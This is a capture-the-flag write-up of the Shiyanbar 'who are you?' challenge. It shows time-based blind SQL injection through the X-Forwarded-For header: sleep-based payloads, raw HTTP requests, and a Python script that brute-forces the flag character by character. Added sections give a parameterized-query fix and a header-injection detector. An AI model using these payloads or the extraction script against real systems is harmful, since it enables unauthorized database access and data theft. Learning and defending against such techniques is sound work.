
Experiment record: the Shiyanbar CTF challenge "who are you?" process

2025-01-31 Update From: SLTechnology News&Howtos


Shulou(Shulou.com)06/03 Report--

First of all, I admit that I looked at what other people had done.

Because I had no experience, although I knew the echo came from the X-Forwarded-For header, I could not get it to work at all, so I looked at a demo.

I am recording this here because it involves writing a script, to keep a record of the injection process.

I looked at two demos and chose the most direct one: run an AWVS scan and then a Python script, because I don't think I have the ability to find injection points manually yet. Learn to use the tools first.

Although others wrote that they used AWVS, at first no matter how I scanned, nothing turned up afterwards. The simple solution turned out to be as follows:

It was that simple. Then I found that it could be injected, and it seemed to be time-based, but I had not studied this systematically and did not understand it; supplementary study material comes later.

The content is as follows:

Tests performed (the AWVS payload with different sleep values, followed by the measured response time):

(select(0)from(select(sleep(N)))v)/*'+(select(0)from(select(sleep(N)))v)+'"+(select(0)from(select(sleep(N)))v)+"*/

sleep(6) => 6.053 s
sleep(0) => 0.062 s
sleep(3) => 3.042 s
sleep(9) => 9.033 s
sleep(0) => 0.047 s
sleep(0) => 0.047 s
sleep(0) => 0.046 s
sleep(6) => 6.052 s
sleep(0) => 0.063 s

Original value: 1

Then test with the HTTP editor.

The simplified GET request is:

GET /web/wonderkun/ HTTP/1.1
X-Forwarded-For: 1'+(select 1 from (select(sleep(5))v)+'
Referer: http://ctf5.shiyanbar.com/web/wonderkun/index.php
Host: ctf5.shiyanbar.com

This is effective.
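The request above works because the application splices the header text into a SQL statement. As an added example that is not code from the original writeup or from the challenge site, here is that pattern beside its hardened form in Python, using an in-memory SQLite schema I constructed to stand in for the challenge's unknown tables (the real back end is MySQL, whose sleep() SQLite lacks, so only the structural flaw is reproduced, not the timing side channel). The names setup_db, record_ip_vulnerable, record_ip_safe and first_valid_ip are mine.

```python
import sqlite3
import ipaddress

# Constructed in-memory schema standing in for the challenge's back end, whose
# real code and tables are not available here: a visitor log fed from the
# X-Forwarded-For header, plus a secrets table that an injection can reach.
def setup_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE visitors (ip TEXT)")
    conn.execute("CREATE TABLE secrets (flag TEXT)")
    conn.execute("INSERT INTO secrets VALUES ('flag{constructed-sample}')")
    return conn

def record_ip_vulnerable(conn, xff):
    """Splice the header text into the SQL string (the flaw behind the writeup).
    A quote inside the header closes the literal and the rest is parsed as SQL."""
    sql = "INSERT INTO visitors (ip) VALUES ('" + xff + "')"
    cur = conn.execute(sql)
    row = conn.execute("SELECT ip FROM visitors WHERE rowid = ?", (cur.lastrowid,)).fetchone()
    return row[0]

def record_ip_safe(conn, xff):
    """Bind the header as a parameter: the driver treats it purely as data,
    so quotes and subqueries inside it are stored literally."""
    cur = conn.execute("INSERT INTO visitors (ip) VALUES (?)", (xff,))
    row = conn.execute("SELECT ip FROM visitors WHERE rowid = ?", (cur.lastrowid,)).fetchone()
    return row[0]

def first_valid_ip(xff):
    """Second layer: X-Forwarded-For is set by the client, so accept only a
    syntactically valid IP address from the comma-separated proxy chain."""
    for item in xff.split(","):
        item = item.strip()
        try:
            return str(ipaddress.ip_address(item))
        except ValueError:
            continue
    return None

if __name__ == "__main__":
    conn = setup_db()
    # Constructed payload in the shape used in the writeup ('...+(subquery)+'),
    # with SQLite's || concatenation in place of MySQL's + arithmetic.
    payload = "1' || (SELECT flag FROM secrets) || '"
    print("vulnerable:", record_ip_vulnerable(conn, payload))
    print("safe:      ", record_ip_safe(conn, payload))
    print("validated: ", first_valid_ip(payload))
```

With a bound parameter the whole header, quotes included, is stored as a string and the subquery never runs; the validation step is the extra check worth having, because a header any client can set should never be more than a list of addresses, and rejecting anything else also removes the echo that leaked the query structure in this challenge.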

Repeated changes should be made inside select(sleep(5)).

Because I happened to see that the demo used a case statement, I tested this statement on my test machine:

select case when (select length(test) from aaa) then sleep(2) else sleep(0) end

It's effective.

Substituting it into the GET request is still effective.

Then I thought about the Shiyanbar challenges: the table and field are basically always called flag, so I tried to see whether that seemed to be the case here.

The GET request is:

GET /web/wonderkun/ HTTP/1.1
X-Forwarded-For: 1'+(select 1 from (select case when (select length(flag) from flag)>10 then sleep(2) else sleep(0) end) v)+'
Referer: http://ctf5.shiyanbar.com/web/wonderkun/index.php
Host: ctf5.shiyanbar.com

Then we started to judge its value, but it seems a loop is needed to guess it; even though the demo gave it, I still did it myself.

First of all, I know that for the table field only two things need to be guessed: the length of the field data and each character of the field.

First, how to guess the field data length; what Baidu gives is as follows:

1. Guess the table name:

http://xxx.com/test.asp?id=123 and (select count(*) from admin)>=0   // guess whether a table admin exists

2. Guess the field name:

http://xxx.com/test.asp?id=123 and (select count(adminname) from admin)>=0   // whether the field adminname exists in table admin

3. Guess the field length:

// select the first record from the admin table and obtain the length of its adminname field

http://xxx.com/test.asp?id=123 and (select top 1 len(adminname) from admin)>=0

http://xxx.com/test.asp?id=123 and (select top 1 len(adminname) from admin)=7   // the adminname field has length 7

4. Guess the field value:

// select the first record from the admin table and guess the value of adminname one character at a time, up to position 7

http://xxx.com/test.asp?id=123 and (select top 1 asc(mid(adminname,1,1)) from admin)=97

http://xxx.com/test.asp?id=123 and (select top 1 asc(mid(adminname,2,1)) from admin)=78

http://xxx.com/test.asp?id=123 and (select top 1 asc(mid(adminname,3,1)) from admin)=96

...

http://xxx.com/test.asp?id=123 and (select top 1 asc(mid(adminname,7,1)) from admin)=102

First guess the length of the field.

Guessing the field length can be done manually quite quickly.

Repeatedly comparing with greater-than and less-than, the result is 32 characters (the len used above seems to differ by database; here I use length).

GET /web/wonderkun/ HTTP/1.1
X-Forwarded-For: 1'+(select 1 from (select case when ((select length(flag) from flag)=32) then sleep(1) else sleep(0) end) v)+'
Referer: http://ctf5.shiyanbar.com/web/wonderkun/index.php
Host: ctf5.shiyanbar.com

The tool I use here is still AWVS's HTTP editor.

Then continue writing the SQL for checking the string on the test machine, but I'll try to create a simulated table first.

I just found out that if should also work without using case; if looks clearer.

select if((select length(flag) from flag)=32, sleep(1), sleep(0))

Unfortunately, replacing the sleep with this failed. Continue looking at how to judge the value; the only thing I should be able to use now is what actually works.

select substring(flag,2,1) from flag should work like this. The substring function should be used, which should be the same as mid.

Try it. By convention, the value should be flag{}. Try it:

GET /web/wonderkun/ HTTP/1.1
X-Forwarded-For: 1'+(select 1 from (select case when ((select substring(flag,1,1) from flag)='f') then sleep(1) else sleep(0) end) v)+'
Referer: http://ctf5.shiyanbar.com/web/wonderkun/index.php
Host: ctf5.shiyanbar.com

But it seems the time was not 1 s; did the guess fail? In retrospect, if did not work just now.

Echo of if:

Your ip is: 1'+(select 1 from (select if((select length(flag) from flag)=32

It seems to have been truncated from there.

It seems we can't move forward without solving the comma problem.

Keep searching for information.

http://www.91ri.org/12168.html

I have to admire the strength of that resource.

Modified request:

GET /web/wonderkun/ HTTP/1.1
X-Forwarded-For: 1'+(select 1 from (select case when ((select substring(flag from 1 for 1) from flag)='f') then sleep(1) else sleep(0) end) v)+'
Referer: http://ctf5.shiyanbar.com/web/wonderkun/index.php
Host: ctf5.shiyanbar.com

Then I tried it. It didn't seem to work, so I changed the sleep(0) that follows to 5.

Start writing the script.

(First of all, you need a Python reference manual.)

First look up requests, then see how a GET request is written and how header information is added.

Give it a go.

Because repeated calls may be required, wrap it in a method first.

I didn't know how to add {}, so I also looked that up on Baidu.

Then it should be a matter of how to judge the time: just take the time before and after execution, and then the whole loop should work.

The completed code, with comments, is as follows:

    # -*- coding: utf-8 -*-
    import requests
    import time

    # define a method that returns the time difference; var is the character
    # being guessed, num is the position being guessed
    def test(var, num):
        # url link
        url = 'http://ctf5.shiyanbar.com/web/wonderkun/index.php'
        # header information; the variables are inserted into X-Forwarded-For
        headers = {}
        # X-Forwarded-For: if this character is at this position, sleep for 5 seconds
        headers['X-Forwarded-For'] = ("1'+(select 1 from (select case when ((select substring(flag from "
                                      + str(num) + " for 1) from flag)='" + str(var)
                                      + "') then sleep(5) else sleep(0) end) v)+'")
        headers['Referer'] = 'http://ctf5.shiyanbar.com/web/wonderkun/index.php'
        headers['Host'] = 'ctf5.shiyanbar.com'
        # take the time before execution
        time_start = time.time()
        r = requests.get(url, headers=headers)
        # take the time after execution
        time_stop = time.time()
        # return the time difference (keep the fractional part; truncating each
        # timestamp to int first can be off by up to a second)
        return time_stop - time_start

    # define testChar as the character dictionary
    testChar = 'abcdefghijklmnopqrstuvwxyz0123456789@_.{}-'

    # the length was found manually to be 32, so loop over positions 1 to 32
    for x in range(1, 33):
        # loop over the candidate characters for a single position
        for j in testChar:
            # judge whether the time difference is at least 5 seconds
            if test(j, x) >= 5:
                # the cracked character
                print(str(x) + ':' + str(j))

It is worth noting that I wrote it wrong at first as 32: xrange(1, 32) only produces 31 values. Also, this challenge did not say the flag is ctf{}; what a pit!
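Seen from the other side, every request the script above sends carries a header value that no proxy chain would ever produce. As an added example that is not part of the original writeup, here is detection logic in Python that classifies X-Forwarded-For values: a clean list of IP addresses passes, anything else is checked for the indicators of a time-based blind injection that appear in this writeup (a delay function, a conditional, a substring call, a subselect, a comment opener). The sample header values are constructed by me, not captured from any system, and the function names classify, scan and is_ip_list are mine.

```python
import re
import ipaddress

# Constructed sample X-Forwarded-For values: two ordinary proxy chains and
# three shapes matching the payloads seen in the writeup above. None of these
# were captured from a real system.
SAMPLE_HEADERS = [
    "203.0.113.5, 10.0.0.7",
    "2001:db8::1",
    "1'+(select 1 from (select sleep(5) v)+'",
    "1'+(select 1 from (select case when ((select substring(flag from 1 for 1) from flag)='f') then sleep(5) else sleep(0) end) v)+'",
    "(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'\"+(select(0)from(select(sleep(6)))v)+\"*/",
]

# Indicators of a time-based blind injection attempt, keyed by what they show.
PATTERNS = {
    "time_delay": re.compile(r"\b(sleep|benchmark|pg_sleep)\s*\(|\bwaitfor\s+delay\b", re.I),
    "conditional": re.compile(r"\bcase\s+when\b|\bif\s*\(", re.I),
    "substring": re.compile(r"\b(substring|substr|mid)\s*\(", re.I),
    "subselect": re.compile(r"\bselect\b.*\bfrom\b", re.I | re.S),
    "comment": re.compile(r"/\*|--|#"),
}

def is_ip_list(value):
    """True if the header is what a proxy chain should look like: only IP addresses."""
    parts = [p.strip() for p in value.split(",")]
    if any(p == "" for p in parts):
        return False
    try:
        for p in parts:
            ipaddress.ip_address(p)
    except ValueError:
        return False
    return True

def classify(value):
    """Return the indicator names matched by a header value; [] for a clean proxy chain."""
    if is_ip_list(value):
        return []
    return [name for name, rx in PATTERNS.items() if rx.search(value)]

def scan(headers):
    """Return (value, indicators) for every header value that trips at least one indicator."""
    hits = []
    for value in headers:
        found = classify(value)
        if found:
            hits.append((value, found))
    return hits

if __name__ == "__main__":
    for value, found in scan(SAMPLE_HEADERS):
        print(", ".join(found), "<-", value)
```

The allow-list check does most of the work: a header that is not purely addresses is already abnormal, and the indicator names only say which technique the value resembles. In a real deployment the same classification would run over the proxy or application log field that records this header, and a burst of hits from one source, with response times clustering at a few fixed values like the 5 s and 0 s in this writeup, is the signature of the extraction loop shown above.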

Challenge:

http://ctf5.shiyanbar.com/web/wonderkun/index.php
